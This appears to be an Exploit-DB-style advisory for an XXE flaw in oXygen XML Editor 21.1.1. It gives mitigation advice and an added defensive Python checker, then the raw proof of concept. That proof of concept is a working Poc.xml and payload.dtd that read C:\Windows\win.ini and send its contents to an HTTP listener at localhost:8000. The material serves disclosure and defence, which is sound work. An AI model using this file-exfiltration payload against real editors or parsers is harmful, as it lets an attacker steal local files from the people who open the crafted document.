Vendor: oxygen_xml_editor
By: Pablo Santiago
CVSS: 7.5 (HIGH)
CWE: 611 (XML External Entity Injection)
Product Name: oxygen_xml_editor
Affected Version From: 21.1.1
Affected Version To: 21.1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:oxygenxml:oxygen_xml_editor:21.1.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
Year: 2019

oXygen XML Editor 21.1.1 – XML External Entity Injection

An XML External Entity Injection (XXE) vulnerability was discovered in oXygen XML Editor 21.1.1 that allows an attacker to read arbitrary files on the system where the editor runs. It is triggered when a user opens a malicious XML file whose DOCTYPE declares a parameter entity referencing a DTD hosted on a remote server. That DTD in turn declares an entity referencing a file on the local system. When the editor parses the document it fetches the remote DTD, resolves the entity, and reads the referenced file, disclosing its contents.

Mitigation:

To mitigate this vulnerability, users should ensure that they are running the latest version of oXygen XML Editor. Additionally, users should not open XML files from untrusted sources.
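As an added defender-side example (not part of the advisory and not the oXygen project's code), the following Python check uses the standard library's expat parser to inspect an untrusted XML file before it is opened in an editor: it records every external entity declaration and refuses every external fetch, so the Poc.xml from the Exploit-DB entry below is flagged without reading win.ini or contacting the DTD server. The embedded POC_XML is a copy of the advisory's Poc.xml; BENIGN_XML and the function name inspect_xml are our own.

```python
"""Pre-open check for untrusted XML: reports the external-entity pattern used
in the oXygen XML Editor 21.1.1 PoC while refusing to fetch anything."""
import xml.parsers.expat as expat

# Copy of Poc.xml from the advisory; the two SYSTEM identifiers point at a
# local file and a remote DTD, which is exactly what the check must surface.
POC_XML = rb"""<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""

# Constructed benign document with an internal-only entity, for contrast.
BENIGN_XML = b'<!DOCTYPE n [<!ENTITY who "ops">]><n>&who;</n>'


def inspect_xml(data: bytes) -> dict:
    """Parse `data` with every external fetch refused and return what the
    DTD tried to do: external declarations, refused fetches, unresolved refs."""
    report = {"external_decls": [], "refused": [], "skipped": []}
    parser = expat.ParserCreate()
    # Without this, expat stops processing the DTD at the first %ref; and the
    # remote DTD reference would never be reported to us.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # SYSTEM/PUBLIC => points outside the document
            report["external_decls"].append((name, bool(is_param), system_id))

    def external_ref(context, base, system_id, public_id):
        # Log the attempted fetch and refuse it. Returning true lets expat go on
        # as if the entity were empty, so neither the file nor the URL is read.
        report["refused"].append(system_id)
        return 1

    def skipped(name, is_param):
        report["skipped"].append(name)  # e.g. &send; once payload.dtd is not loaded

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.SkippedEntityHandler = skipped
    parser.Parse(data, True)
    report["xxe_suspect"] = bool(report["external_decls"] or report["refused"])
    return report


if __name__ == "__main__":
    for label, doc in (("Poc.xml", POC_XML), ("benign", BENIGN_XML)):
        print(label, inspect_xml(doc))
```

Run against a file received by mail or download, a non-empty `external_decls` or `refused` list is the signal to not open it in an editor that resolves external entities.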

Exploit-DB raw data:

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source: https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000
1.1- Poc.xml:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2- payload.dtd:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9